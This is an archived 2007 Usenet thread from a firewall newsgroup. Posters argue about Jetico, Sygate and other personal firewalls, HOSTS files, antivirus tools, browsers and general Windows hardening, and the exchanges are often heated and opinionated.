Jetico Personal Firewall freeware asks way to many questions
on 11.10.2007 18:22:37 by Linda Sands
Is there an easy way to get Jetico Personal Firewall to only ask ONCE (like
Zone Alarm or Sygate Personal Firewall does)?
For example, when I run CCleaner freeware, Jetico is welcome to ask if I
want to run it but with the "remember" button set, Jetico should LEARN that
I want CCleaner to run without asking me again. Yet every time CCleaner
runs, Jetico asks me again (even with the Remember button selected).
Same thing with Firefox freeware, PeerGuardian freeware, Windows update,
etc.
There MUST be a way to tell Jetico Personal Firewall to just Remember
(really remember) the previous answer .. isn't there?
Re: Jetico Personal Firewall freeware asks way to many questions
on 11.10.2007 23:06:34 by Sebastian Gottschalk
Linda Sands wrote:
> There MUST be a way to tell Jetico Personal Firewall to just Remember
> (really remember) the previous answer .. isn't there?
Hm... why don't you simply uninstall it? Why did you even install it in
the first place?
Re: Jetico Personal Firewall freeware asks way to many questions
on 11.10.2007 23:43:53 by Chief Suspect
In article <96sPi.1575$Pv2.1234@newssvr23.news.prodigy.net>,
lshorsetrainer@sbcglobal.net says...
> Is there an easy way to get Jetico Personal Firewall to only ask ONCE (like
> Zone Alarm or Sygate Personal Firewall does)? [snip]
=======================
Same problem; I uninstalled it.
Same problem with Comodo, too; I uninstalled it.
Zone Alarm and Sygate both have become really bloated, and think too
long about things.
Currently using Netveda Safety Net, and am pleased with it. Only
8MB or so installed
Lord Possum
Re: Jetico Personal Firewall freeware asks way to many questions
on 12.10.2007 00:08:53 by goarilla
Linda Sands wrote:
> Is there an easy way to get Jetico Personal Firewall to only ask ONCE (like
> Zone Alarm or Sygate Personal Firewall does)?
>
> For example, when I run CCleaner freeware, Jetico is welcome to ask if I
> want to run it but with the "remember" button set, Jetico should LEARN that
> I want CCleaner to run without asking me again. Yet every time CCleaner
> runs, Jetico asks me again (even with the Remember button selected).
>
> Same thing with Firefox freeware, PeerGuardian freeware, Windows update,
> etc.
>
> There MUST be a way to tell Jetico Personal Firewall to just Remember
> (really remember) the previous answer .. isn't there?
you should read the documentation and edit the default optimum
protection security policy
or you can just use another security policy like allow all but that
sorta defeats the
purpose of a personal firewall
Re: Jetico Personal Firewall freeware asks way to many questions
on 12.10.2007 00:31:11 by unknown
Post removed (X-No-Archive: yes)
Re: Jetico Personal Firewall freeware asks way to many questions
on 12.10.2007 04:25:46 by AlleyCat
In article ,
Lord_Possum@yahoo.com says...
> In article <96sPi.1575$Pv2.1234@newssvr23.news.prodigy.net>,
> lshorsetrainer@sbcglobal.net says...
> > Is there an easy way to get Jetico Personal Firewall to only ask ONCE (like
> > Zone Alarm or Sygate Personal Firewall does)? [snip]
> =======================
> Same problem; I uninstalled it.
>
> Same problem with Comodo, too; I uninstalled it.
>
> Zone Alarm and Sygate both have become really bloated, and think too
> long about things.
>
> Currently using Netveda Safety Net, and am pleased with it. Only
> 8MB or so installed
Is that particularly small for a Firewall? I'm not sure your description
of Sygate being "really bloated", is entirely accurate. I'm not pushing
or endorsing Sygate, but my installation is 12 megs. That's not that
bloated IMO. If it, or any software package, does what it advertises, 4
megs doesn't make THAT much of a difference. I've tried most "endorsed"
firewalls, but I always seem to "go back" to Sygate.
Al
>
> Lord Possum
>
Re: Jetico Personal Firewall freeware asks way to many questions
on 12.10.2007 18:46:17 by Sebastian Gottschalk
goarilla wrote:
> or you can just use another security policy like allow all but that
> sorta defeats the
> purpose of a personal firewall
AFAWK the purpose of a "personal firewall" is to fuck up the network
connection, which it obviously does.
Re: Jetico Personal Firewall freeware asks way to many questions
on 12.10.2007 19:38:29 by Chief Suspect
In article ,
al@aohell.com says...
>Is that particularly small for a Firewall? I'm not sure your
>description of Sygate being "really bloated", is entirely accurate.
>I'm not pushing or endorsing Sygate, but my installation is 12 megs.
>That's not that bloated IMO. If it, or any software package, does
>what it advertises, 4 megs doesn't make THAT much of a difference.
>I've tried most "endorsed" firewalls, but I always seem to "go
>back" to Sygate. Al
============================
One of the criteria I employ in judging a program's worth is not only
the installed size, but the amount of Registry entries, and the
number of functions requiring 'think' power ... a drain on RAM
resources. Sygate is heavier than many in that respect.
And, as far as installed size ... 12MB compared to 8MB tells me
immediately that Sygate is 50% bigger, while doing no more or any
better than what I use. That apparently will not mean much to those
who don't care how much room a program takes up, but the extra 4MB
means more of something else for me. And, in the end result, NetVeda
is faster.
Lord Possum
Re: Jetico Personal Firewall freeware asks way to many questions
on 13.10.2007 10:03:28 by unknown
Post removed (X-No-Archive: yes)
TEST POST - IGNORE
on 13.10.2007 20:35:54 by Double Z
don't mind me
Re: Jetico Personal Firewall freeware asks way to many questions
on 14.10.2007 03:13:03 by AlleyCat
In article ,
Lord_Possum@yahoo.com says...
> In article ,
> al@aohell.com says...
>
> >Is that particularly small for a Firewall? I'm not sure your
> >description of Sygate being "really bloated", is entirely accurate.
> >I'm not pushing or endorsing Sygate, but my installation is 12 megs.
> >That's not that bloated IMO. If it, or any software package, does
> >what it advertises, 4 megs doesn't make THAT much of a difference.
> >I've tried most "endorsed" firewalls, but I always seem to "go
> >back" to Sygate. Al
> ============================
>
> One of the criteria I employ in judging a program's worth is not only
> the installed size, but the amount of Registry entries, and the
> number of functions requiring 'think' power ... a drain on RAM
> resources. Sygate is heavier than many in that respect.
>
> And, as far as installed size ... 12MB compared to 8MB tells me
> immediately that Sygate is 50% bigger, while doing no more or any
> better than what I use. That apparently will not mean much to those
> who don't care how much room a program takes up, but the extra 4MB
> means more of something else for me. And, in the end result, NetVeda
> is faster.
>
> Lord Possum
>
I've had this conversation with others in the past and found that, with
the "right" equipment, 4megs of hard drive space and 2 or 3 megs of RAM
is not very much. I'm running a 2.8GHz Pentium D with 2 Gigs of RAM. I
know not everyone has these resources, but I believe most people
frequenting this newsgroup looking for software, are probably people
that are pretty computer savvy and do have newer hardware which will run
most any of the software being discussed about here. It seems apropos
that someone here could come up with a list of software with attributes
pertaining to RAM and hard drive space usage. I'm sure there's a website
that does this, but I'm not familiar with one.
Al
Re: Jetico Personal Firewall freeware asks way to many questions
on 16.10.2007 18:22:37 by unknown
Post removed (X-No-Archive: yes)
Re: Jetico Personal Firewall freeware asks way to many questions
on 16.10.2007 19:10:06 by Sebastian Gottschalk
hmmm@hmmm.org wrote:
> Aaron wrote in
> news:Xns99C8A3502A20Faaronnewsgroup@85.214.62.108:
>
>> Moreover OA is not just a firewall but includes HIPS (but so does the
>> Comodo v3 but that's in beta). I personally find OA one of the more
>> usable HIPS for ordinary users.
HIPS is nonsense, and even HIDS is for anyone but ordinary users. At any
rate, the horribly broken and unusable software products you're discussing
only include signature-based engines, which is quite useless.
> OA also gets an excellent rating from Matousec.
Hm... isn't that rather a bad thing?
> Let's see what the free
> version gets. ZA Pro has a very good rating while ZA free has a very poor
> rating. The latest version of ZA Pro uses about 80 mg ram!
WTF? I knew this software was totally bad, but THAT bad...
Re: Jetico Personal Firewall freeware asks way to many questions
on 17.10.2007 17:01:26 by unknown
Post removed (X-No-Archive: yes)
Re: TEST POST - IGNORE
on 22.10.2007 19:48:37 by Dustin Cook
"Double Z" wrote in
news:TM2dnTqNvcavjYzanZ2dneKdnZydnZ2d@giganews.com:
> don't mind me
ok
--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt
Re: Jetico Personal Firewall freeware asks way to many questions
on 28.10.2007 18:55:07 by gary
Lord Possum wrote:
> In article ,
> al@aohell.com says...
>
>> Is that particularly small for a Firewall? I'm not sure your
>> description of Sygate being "really bloated", is entirely accurate.
>> I'm not pushing or endorsing Sygate, but my installation is 12 megs.
>> That's not that bloated IMO. If it, or any software package, does
>> what it advertises, 4 megs doesn't make THAT much of a difference.
>> I've tried most "endorsed" firewalls, but I always seem to "go
>> back" to Sygate. Al
> ============================
>
> One of the criteria I employ in judging a program's worth is not only
> the installed size, but the amount of Registry entries, and the
> number of functions requiring 'think' power ... a drain on RAM
> resources. Sygate is heavier than many in that respect.
>
> And, as far as installed size ... 12MB compared to 8MB tells me
> immediately that Sygate is 50% bigger, while doing no more or any
> better than what I use. That apparently will not mean much to those
> who don't care how much room a program takes up, but the extra 4MB
> means more of something else for me. And, in the end result, NetVeda
> is faster.
>
> Lord Possum
What version of Sygate are you referring to? 5.5.2710 is not bloated in
my opinion.
Re: Jetico Personal Firewall freeware asks way to many questions
on 28.10.2007 20:17:11 by Ansgar -59cobalt- Wiechers
In comp.security.firewalls Gary wrote:
> Lord Possum wrote:
>> One of the criteria I employ in judging a program's worth is not only
>> the installed size, but the amount of Registry entries, and the
>> number of functions requiring 'think' power ... a drain on RAM
>> resources. Sygate is heavier than many in that respect.
>>
>> And, as far as installed size ... 12MB compared to 8MB tells me
>> immediately that Sygate is 50% bigger, while doing no more or any
>> better than what I use. That apparently will not mean much to those
>> who don't care how much room a program takes up, but the extra 4MB
>> means more of something else for me. And, in the end result, NetVeda
>> is faster.
>
> What version of Sygate are you referring to? 5.5.2710 is not bloated
> in my opinion.
It just has serious design flaws and won't receive any bugfixes anymore.
Some qualification for a "security" product.
cu
59cobalt
--
"If a software developer ever believes a rootkit is a necessary part of
their architecture they should go back and re-architect their solution."
--Mark Russinovich
Re: Jetico Personal Firewall freeware asks way to many questions
on 28.10.2007 21:15:49 by madmax
Ansgar -59cobalt- Wiechers after much
thought,came up with this jewel in news:fg2n7nUkp7L2@news.in-ulm.de:
> In comp.security.firewalls Gary wrote:
>> Lord Possum wrote:
>>> One of the criteria I employ in judging a program's worth is not
>>> only the installed size, but the amount of Registry entries, and
>>> the number of functions requiring 'think' power ... a drain on
>>> RAM resources. Sygate is heavier than many in that respect.
>>>
>>> And, as far as installed size ... 12MB compared to 8MB tells me
>>> immediately that Sygate is 50% bigger, while doing no more or
>>> any better than what I use. That apparently will not mean much
>>> to those who don't care how much room a program takes up, but
>>> the extra 4MB means more of something else for me. And, in the
>>> end result, NetVeda is faster.
>>
>> What version of Sygate are you referring to? 5.5.2710 is not
>> bloated in my opinion.
>
> It just has serious design flaws and won't receive any bugfixes
> anymore. Some qualification for a "security" product.
>
> cu
> 59cobalt
Software "firewall" is not a real firewall and a waste of resources.
A router/hardening your system/safe-hex is the way to go.
max
--
Virus Removal http://max.shplink.com/removal.html
Keep Clean http://max.shplink.com/keepingclean.html
Tools http://max.shplink.com/tools.html
Change nomail.afraid.org to gmail.com to reply by email.
Re: Jetico Personal Firewall freeware asks way to many questions
on 28.10.2007 22:33:50 by Sebastian Gottschalk
Gary wrote:
> What version of Sygate are you referring to? 5.5.2710 is not bloated in
> my opinion.
Sygate is bloated by design.
Re: Jetico Personal Firewall freeware asks way to many questions
on 28.10.2007 22:37:15 by Sebastian Gottschalk
Max M.Wachtel III wrote:
> Software "firewall" is not a real firewall and a waste of resources.
Right start, wrong conclusion. Just because it isn't a firewall doesn't mean
that it's not a security concept or can't be part of it. Indeed it is a
host-based packet filter, and, if used correctly (which already excludes all
the common "personal firewall" stuff) and not being too broken (again this
excludes all the common nonsense) can achieve a certain gain of security.
> A router/hardening your system/safe-hex is the way to go.
The common SOHO router stuff is neither a firewall nor is it suitable to
implement a routing firewall.
Re: Jetico Personal Firewall freeware asks way to many questions
on 28.10.2007 22:54:49 by private
On Sun, 28 Oct 2007 22:37:15 +0100, Sebastian G. wrote:
> > Software "firewall" is not a real firewall and a waste of resources.
> Right start, wrong conclusion. Just because it isn't a firewall doesn't mean
> that it's not a security concept or can't be part of it. Indeed it is a
> host-based packet filter, and, if used correctly (which already excludes all
> the common "personal firewall" stuff) and not being too broken (again this
> excludes all the common nonsense) can achieve a certain gain of security.
Can you suggest alternative software other than the common "personal
firewall" stuff that will achieve a certain gain of security (on a
Windows OS) ? Tnx.
--
s|b
Re: Jetico Personal Firewall freeware asks way to many questions
on 28.10.2007 23:24:30 by madmax
"Sebastian G." after much thought,came up with
this jewel in news:5okdovFn7fe1U1@mid.dfncis.de:
> Max M.Wachtel III wrote:
>
>
>> Software "firewall" is not a real firewall and a waste of
>> resources.
>
>
> Right start, wrong conclusion. Just because it isn't a firewall
> doesn't mean that it's not a security concept or can't be part of
> it. Indeed it is a host-based packet filter, and, if used
> correctly (which already excludes all the common "personal
> firewall" stuff) and not being too broken (again this excludes all
> the common nonsense) can achieve a certain gain of security.
>
>> A router/hardening your system/safe-hex is the way to go.
>
>
> The common SOHO router stuff is neither a firewall nor is it
> suitable to implement a routing firewall.
You're correct. I think a router provides better protection than using
a software firewall (some routers include a packet filter). And
turning off un-needed services, using a more secure e-mail
client/browser (like Thunderbird, Firefox) is better than relying on a
software firewall alone.
max
--
Virus Removal http://max.shplink.com/removal.html
Keep Clean http://max.shplink.com/keepingclean.html
Tools http://max.shplink.com/tools.html
Change nomail.afraid.org to gmail.com to reply by email.
Re: Jetico Personal Firewall freeware asks way to many questions
on 28.10.2007 23:33:53 by madmax
"s|b" after much thought,came up with this
jewel in news:Jy7Vi.179033$nI4.8773744@phobos.telenet-ops.be:
> On Sun, 28 Oct 2007 22:37:15 +0100, Sebastian G. wrote:
>
>> > Software "firewall" is not a real firewall and a waste of
>> > resources.
>
>> Right start, wrong conclusion. Just because it isn't a firewall
>> doesn't mean that it's not a security concept or can't be part of
>> it. Indeed it is a host-based packet filter, and, if used
>> correctly (which already excludes all the common "personal
>> firewall" stuff) and not being too broken (again this excludes
>> all the common nonsense) can achieve a certain gain of security.
>
> Can you suggest alternative software other than the common
> "personal firewall" stuff that will achieve a certain gain of
> security (on a Windows OS) ? Tnx.
>
Here is a good start-
MVPS hosts file
Firefox with NoScript and AdBlock installed
a good AV solution(like NOD32)
Spyware Blaster
Spybot Search+Destroy immunization
Turn off Windows Messenger
max
--
Virus Removal http://max.shplink.com/removal.html
Keep Clean http://max.shplink.com/keepingclean.html
Tools http://max.shplink.com/tools.html
Change nomail.afraid.org to gmail.com to reply by email.
Re: Jetico Personal Firewall freeware asks way to many questions
on 28.10.2007 23:46:40 by private
On Sun, 28 Oct 2007 22:33:53 GMT, Max M.Wachtel III wrote:
> Here is a good start-
> MVPS hosts file
Already using it.
> Firefox with NoScript and AdBlock installed
Already using it.
> a good AV solution(like NOD32)
I use Avast, but if I want to stick with freeware, then I'd probably be
better off with Avira Antivir.
> Spyware Blaster
Never used it.
> Spybot Search+Destroy immunization
Already using it.
> Turn off Windows Messenger
First thing I did when I started this PC.
Anything else?
--
s|b
Re: Jetico Personal Firewall freeware asks way to many questions
on 29.10.2007 00:33:41 by Sebastian Gottschalk
s|b wrote:
> Can you suggest alternative software other than the common "personal
> firewall" stuff that will achieve a certain gain of security (on a
> Windows OS) ? Tnx.
WinIPFW
(but only the latest SVN snapshot + some security fixes)
Re: Jetico Personal Firewall freeware asks way to many questions
on 29.10.2007 00:36:05 by Sebastian Gottschalk
Max M.Wachtel III wrote:
> Here is a good start-
> MVPS hosts file
A very bad start for a proposedly good start. What should this shit be good
for, other than fucking up the system?
> Firefox with NoScript and AdBlock installed
AdBlock is not security relevant. And, of course, what about Firefox? Even
NoScript can't make it any less broken. If you really like a Mozilla core,
take Mozilla SeaMonkey.
> a good AV solution(like NOD32)
This is not even a solution at all.
> Spyware Blaster
Oh please...
> Spybot Search+Destroy immunization
OH PLEASE...
> Turn off Windows Messenger
Eh... yeah? Of course, intentionally running an insecure-by-design software
is never a good idea.
Re: Jetico Personal Firewall freeware asks way to many questions
on 29.10.2007 00:37:01 by Sebastian Gottschalk
s|b wrote:
> Anything else?
Yes. Please flatten and rebuild your system. You broke it.
Re: Jetico Personal Firewall freeware asks way to many questions
on 29.10.2007 01:15:42 by madmax
"Sebastian G." after much thought,came up with
this jewel in news:5okkncFn7a1hU2@mid.dfncis.de:
> Max M.Wachtel III wrote:
>
>
>> Here is a good start-
>> MVPS hosts file
>
>
> A very bad start for a proposedly good start. What should this
> shit be good for, other than fucking up the system?
what???? a good hosts file doesn't f*ckup anything.
>> Firefox with NoScript and AdBlock installed
>
>
> AdBlock is not security relevant.
I just have no use for unsolicited ads...
> And, of course, what about
> Firefox? Even NoScript can't make it any less broken.
for control of javascript....
> If you
> really like a Mozilla core, take Mozilla SeaMonkey.
I use Portable Apps and SM is not yet available.
>> a good AV solution(like NOD32)
>
>
> This is not even a solution at all.
what do you use?
>
>> Spyware Blaster
>> Spybot Search+Destroy immunization
any added protection that uses no extra resources is a good thing.
>> Turn off Windows Messenger
>
> Eh... yeah? Of course, intentionally running an insecure-by-design
> software is never a good idea.
Why do you say anything is broken????
--
Virus Removal http://max.shplink.com/removal.html
Keep Clean http://max.shplink.com/keepingclean.html
Tools http://max.shplink.com/tools.html
Change nomail.afraid.org to gmail.com to reply by email.
Re: Jetico Personal Firewall freeware asks way to many questions
on 29.10.2007 01:20:20 by madmax
"Sebastian G." after much thought,came up with this
jewel in news:5n9mmpFh72sbU1@mid.dfncis.de:
> goarilla wrote:
>
>
>> or you can just use another security policy like allow all but that
>> sorta defeats the
>> purpose of a personal firewall
>
>
> AFAWK the purpose of a "personal firewall" is to fuck up the network
> connection, which it obviously does.
>
I have yet to put anyone in my killfile but you are getting close.
You don't happen to be a 3rd cousin of pcbutts?
max
--
Virus Removal http://max.shplink.com/removal.html
Keep Clean http://max.shplink.com/keepingclean.html
Tools http://max.shplink.com/tools.html
Change nomail.afraid.org to gmail.com to reply by email.
Re: Jetico Personal Firewall freeware asks way to many questions
on 29.10.2007 04:21:23 by goarilla
Sebastian G. wrote:
> Max M.Wachtel III wrote:
>
>
>> Here is a good start-
>> MVPS hosts file
>
>
> A very bad start for a proposedly good start. What should this shit be
> good for, other than fucking up the system?
>
what ???
come on i know lots of entries pointing to localhost is a cat and mouse game
at best but still ...
>> Firefox with NoScript and AdBlock installed
>
>
> AdBlock is not security relevant. And, of course, what about Firefox?
> Even NoScript can't make it any less broken. If you really like a
> Mozilla core, take Mozilla SeaMonkey.
>
yes firefox is well ... a horrible code base but besides opera
are there really any good standards compliant (sort of) browsers out there
besides SM shares a LOT of that horrible code base
how is firefox broken ?
>> a good AV solution(like NOD32)
>
>
> This is not even a solution at all.
>
true but NOD32 is the nicest of all PAV solutions (personal anti-virus :D)
>> Spyware Blaster
>
>
> Oh please...
>
>> Spybot Search+Destroy immunization
>
>
> OH PLEASE...
>
>> Turn off Windows Messenger
>
>
> Eh... yeah? Of course, intentionally running an insecure-by-design
> software is never a good idea.
are you against IM or just against MSN + MSNP ?
Re: Jetico Personal Firewall freeware asks way to many questions
on 29.10.2007 08:50:28 by Sebastian Gottschalk
Max M.Wachtel III wrote:
>>> MVPS hosts file
>>
>> A very bad start for a proposedly good start. What should this
>> shit be good for, other than fucking up the system?
>
> what???? a good hosts file doesn't f*ckup anything.
It does. It slows down the resolver and, in case of Windows, even
partially breaks it. Aside from that, it's simply superfluous.
Even further, it simply doesn't work, as a normal user doesn't have write
access to the HOSTS file, and doesn't have the privilege to restart the
system either - neither would this be reasonable.
>> If you
>> really like a Mozilla core, take Mozilla SeaMonkey.
> I use Portable Apps and SM is not yet available.
Mozilla SeaMonkey is profile-portable by design.
>>> a good AV solution(like NOD32)
>>
>> This is not even a solution at all.
> what do you use?
A real solution: a global non-exec policy enforced by the kernel.
>>> Spyware Blaster
>>> Spybot Search+Destroy immunization
>
> any added protection that uses no extra resources is a good thing.
Any added software increases complexity and therefore decreases security.
Unless it can actually justify this, it is a bad thing. Spyware scanners
definitely are bad, and this immunization stuff has only one purpose:
fucking up the system.
> Why do you say anything is broken????
Because it usually is. Just like your concept.
Re: Jetico Personal Firewall freeware asks way to many questions
on 29.10.2007 09:02:23 by Sebastian Gottschalk
goarilla wrote:
> come on i know lots of entries pointing to localhost is a cat and mouse game
> at best but still ...
it slows down the resolver and, in case of Windows, partially breaks it.
Updating the HOSTS file requires write access that a normal user doesn't
have there, and an unwanted restart.
> yes firefox is well ... a horrible code base but besides opera
> are there really any good standards compliant (sort of) browsers out there
> besides SM shares a LOT of that horrible code base
Hm? The horrible code of Firefox starts where the common base ends.
> how is firefox broken ?
Just one keyword: Global Namespace Pollution
> true but NOD32 is the nicest of all PAV solutions (personal anti-virus :D)
So what? I'd say my trash can is the most beautiful one in the area. Yet
it's full of garbage and stinks.
> are you against IM or just against MSN + MSNP ?
Not even against the MSN IM protocol, but you should use an IM
implementation that isn't designed to execute arbitrary commands of the
attacker's choice by default - which applies to Windows Messenger, MSN
Messenger, MSN Explorer, Yahoo Messenger, ICQ/Lite and AIM. Quite strange
that all the "official" clients are all broken by design, and the
third-party implementations are the only safe ones...
Re: Jetico Personal Firewall freeware asks way to many questions
on 29.10.2007 11:57:05 by Jim Ford
Max M.Wachtel III wrote:
> I have yet to put anyone in my killfile but you are getting close.
> You don't happen to be a 3rd cousin of pcbutts?
> max
No, don't do that - Seb's our resident 'Grumpy Old Man' and we love him
dearly on this NG!
Jim Ford
Re: Jetico Personal Firewall freeware asks way to many questions
on 29.10.2007 16:04:38 by goarilla
Sebastian G. wrote:
> goarilla wrote:
>
>
>> come on i know lots of entries pointing to localhost is a cat and mouse
>> game
>> at best but still ...
>
>
> it slows down the resolver and, in case of Windows, partially breaks
> it. Updating the HOSTS file requires write access that a normal user
> doesn't have there, and an unwanted restart.
>
never had a problem with it on a win xp machine
but i don't really use the machine, my sister does
>> yes firefox is well ... a horrible code base but besides opera
>> are there really any good standards compliant (sort of) browsers out
>> there
>> besides SM shares a LOT of that horrible code base
>
>
> Hm? The horrible code of Firefox starts where the common base ends.
XUL is a big bloated piece of crap
>
>> how is firefox broken ?
>
>
> Just one keyword: Global Namespace Pollution
>
>> true but NOD32 is the nicest of all PAV solutions (personal anti-virus
>> :D)
>
>
> So what? I'd say my trash can is the most beautiful one in the area. Yet
> it's full of garbage and stinks.
>
you may talk all big and mighty but you're probably working with homogenous
network environments in which ADS,group policy, proxy servers, etc, ...
can be implemented
sadly this isn't the case in 99,99 % of the home LAN environments and in
which NOD32 is really really nice
although it's a band-aid
>> are you against IM or just against MSN + MSNP ?
>
>
> Not even against the MSN IM protocol, but you should use an IM
> implementation that isn't designed to execute arbitrary commands of the
> attacker's choice by default - which applies to Windows Messenger, MSN
> Messenger, MSN Explorer, Yahoo Messenger, ICQ/Lite and AIM. Quite
> strange that all the "official" clients are all broken by design, and
> the third-party implementations are the only safe ones...
true i use bitlbee + irssi
Re: Jetico Personal Firewall freeware asks way to many questions
on 29.10.2007 17:45:15 by Sebastian Gottschalk
goarilla wrote:
> XUL is a big bloated piece of crap
Quite the contrary. It allows for reference safety, type safety and contract
enforcement, and is still very fast due to JIT. One could compare it to
Java, or rather Python (because it allows on-the-fly changes).
>> So what? I'd say my trash can is the most beautiful one in the area. Yet
>> it's full of garbage and stinks.
>>
>
> you may talk all big and mighty but you're probably working with homogenous
> network environments in which ADS,group policy, proxy servers, etc, ...
> can be implemented
I wouldn't call a mixture of SunRay with Solaris and Debian Linux, x86 with
Debian and Windows 2000 + XP homogenous.
But why do you name group policy? This is, by design, not a security measure.
> sadly this isn't the case in 99,99 % of the home LAN environments and in
> which NOD32 is really really nice
> although it's a band-aid
As you say: it's a band-aid. Nothing more. Security starts with addressing
the causing, not cascading the symptoms. Especially since the main problem,
lacking user education, is even further amplified.
Re: Jetico Personal Firewall freeware asks way to many questions
on 29.10.2007 19:33:42 by goarilla
Sebastian G. wrote:
> goarilla wrote:
>
>
>> XUL is a big bloated piece of crap
>
>
> Quite the contrary. It allows for reference safety, type safety and
> contract enforcement, and is still very fast due to JIT. One could
> compare it to Java, or rather Python (because it allows on-the-fly
> changes).
>
>>> So what? I'd say my trash can is the most beautiful one in the area.
>>> Yet it's full of garbage and stinks.
>>>
>>
>> you may talk all big and mighty but you're probably working with
>> homogenous
>> network environments in which ADS,group policy, proxy servers, etc,
>> ... can be implemented
>
>
> I wouldn't call a mixture of SunRay with Solaris and Debian Linux, x86
> with Debian and Windows 2000 + XP homogenous.
> But why do you name group policy? This is, by design, not a security
> measure.
>
>> sadly this isn't the case in 99,99 % of the home LAN environments and
>> in which NOD32 is really really nice
>> although it's a band-aid
>
>
> As you say: it's a band-aid. Nothing more. Security starts with
> addressing the causing, not cascading the symptoms. Especially since the
> main problem, lacking user education, is even further amplified.
ok what would you do when some of your stupid users
gets a virus ? reset a known good image ? that only works
if you have a homogenous windows env.
well not quite but if you have lots of different pc's with windows it's
a lot harder because you have
to manage a lot of different images
and what's the causing of security problems beside the user ?
Re: Jetico Personal Firewall freeware asks way to many questions
am 29.10.2007 20:15:32 von private
On Mon, 29 Oct 2007 00:37:01 +0100, Sebastian G. wrote:
> > Anything else?
> Yes. Please flatten and rebuild your system. You broke it.
That's _really_ helpful. Danke!
--
s|b
Re: Jetico Personal Firewall freeware asks way to many questions
am 29.10.2007 20:18:05 von private
On Mon, 29 Oct 2007 00:33:41 +0100, Sebastian G. wrote:
> WinIPFW
> (but only the latest SVN snapshot + some security fixes)
Thanks, I'll take a look at it.
--
s|b
Re: Jetico Personal Firewall freeware asks way to many questions
am 30.10.2007 01:15:33 von Sebastian Gottschalk
goarilla wrote:
> ok what would you do when some of your stupid users
> gets a virus?
Depends on which systems. Those with higher security margins have a global
no-exec policy implemented, thus they simply can't run anything but the
preinstalled software, and as long as this is up-to-date an in-memory
process compromise of the network is extremely unlikely.
On those with lesser security margin: Delete all programs and
script-relevant setting, if necessary restore their settings and their data
from the latest backup.
> well not quite but if you have lots of different pc's with windows it's
> a lot harder because you have
> to manage a lot of different images
Why are you always coming up with images? A user running malicious software
only compromises all the programs and the data he had access to, which is,
beside some necessarily shared data, only his own data. He can't damage the
data of other user, and neither the system.
> and what's the causing of security problems beside the user ?
Hardware errors. This is what the restore images are intended for: getting
the old system running on the new hardware again as soon as possible.
Re: Jetico Personal Firewall freeware asks way to many questions
am 30.10.2007 01:18:02 von Sebastian Gottschalk
s|b wrote:
> On Mon, 29 Oct 2007 00:37:01 +0100, Sebastian G. wrote:
>
>>> Anything else?
>
>> Yes. Please flatten and rebuild your system. You broke it.
>
> That's _really_ helpful. Danke!
According to all the damage that you claimed to have done to your system, I
don't see any reasonable chance to get it up running normally and then even
securing it without a complete reinstall. The next time you should think
very very very careful about every non-user-specific change that you
introduce to the system, at best twice, before you most likely discard it as
a stupid idea.
Re: Jetico Personal Firewall freeware asks way to many questions
am 30.10.2007 14:46:10 von goarilla
Sebastian G. wrote:
> goarilla wrote:
>
>
>> ok what would you do when some of your stupid users
>> gets a virus?
>
>
> Depends on which systems. Those with higher security margins have a
> global no-exec policy implemented, thus they simply can't run anything but
> the preinstalled software, and as long as this is up-to-date an
> in-memory process compromise of the network is extremely unlikely.
>
how does one do that ?
have any concrete information pertaining these security measures ?
> On those with lesser security margin: Delete all programs and
> script-relevant setting, if necessary restore their settings and their
> data from the latest backup.
>
>> well not quite but if you have lots of different pc's with windows
>> it's a lot harder because you have
>> to manage a lot of different images
>
>
> Why are you always coming up with images? A user running malicious
> software only compromises all the programs and the data he had access
> to, which is, beside some necessarily shared data, only his own data. He
> can't damage the data of other user, and neither the system.
>
in a perfect world yes
that's how i do it here
and well it's not uncommon for malware to use local (root) exploits
to escalate privilege
>> and what's the causing of security problems beside the user ?
>
>
> Hardware errors. This is what the restore images are intended for:
> getting the old system running on the new hardware again as soon as
> possible.
huh please explain. do you have some information on how to create
'restore images' since when ... i think image i think hardware specific
root filesystem (windows)
Re: Jetico Personal Firewall freeware asks way to many questions
am 30.10.2007 22:10:29 von private
On Tue, 30 Oct 2007 01:18:02 +0100, Sebastian G. wrote:
> According to all the damage that you claimed to have done to your system, I
> don't see any reasonable chance to get it up running normally and then even
> securing it without a complete reinstall. The next time you should think
> very very very careful about every non-user-specific change that you
> introduce to the system, at best twice, before you most likely discard it as
> a stupid idea.
I'm quite happy with my system, so there's really no need for you to
sulk about it...
--
s|b
Re: Jetico Personal Firewall freeware asks way to many questions
am 30.10.2007 22:46:24 von Dustin Cook
"Max M.Wachtel III" wrote in
news:Xns99D7A575FF87Ewhatsinaname@207.115.17.102:
> Ansgar -59cobalt- Wiechers after much
> thought,came up with this jewel in news:fg2n7nUkp7L2@news.in-ulm.de:
>
>> In comp.security.firewalls Gary wrote:
>>> Lord Possum wrote:
>>>> One of the criteria I employ in judging a program's worth is not
>>>> only the installed size, but the amount of Registry entries, and
>>>> the number of functions requiring 'think' power ... a drain on
>>>> RAM resources. Sygate is heavier than many in that respect.
>>>>
>>>> And, as far as installed size ... 12MB compared to 8MB tells me
>>>> immediately that Sygate is 50% bigger, while doing no more or
>>>> any better than what I use. That apparently will not mean much
>>>> to those who don't care how much room a program takes up, but
>>>> the extra 4MB means more of something else for me. And, in the
>>>> end result, NetVeda is faster.
>>>
>>> What version of sygate are you referring to? 5.5.2710 is not
>>> bloated in my opinion.
>>
>> It just has serious design flaws and won't receive any bugfixes
>> anymore. Some qualification for a "security" product.
>>
>> cu
>> 59cobalt
>
> Software "firewall" is not a real firewall and a waste of resources.
I wouldn't outright say a waste of resources, you can use one to keep
some applications from calling home.. for whatever reason. :)
> A router/hardening your system/safe-hex is the way to go.
> max
Agreed.
--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt
Re: Jetico Personal Firewall freeware asks way to many questions
am 30.10.2007 22:48:45 von Dustin Cook
"Sebastian G." wrote in
news:5okkncFn7a1hU2@mid.dfncis.de:
> Max M.Wachtel III wrote:
>
>
>> Here is a good start-
>> MVPS hosts file
>
>
> A very bad start for a proposedly good start. What should this shit be
> good for, other than fucking up the system?
>
>> Firefox with NoScript and AdBlock installed
>
>
> AdBlock is not security relevant. And, of course, what about Firefox?
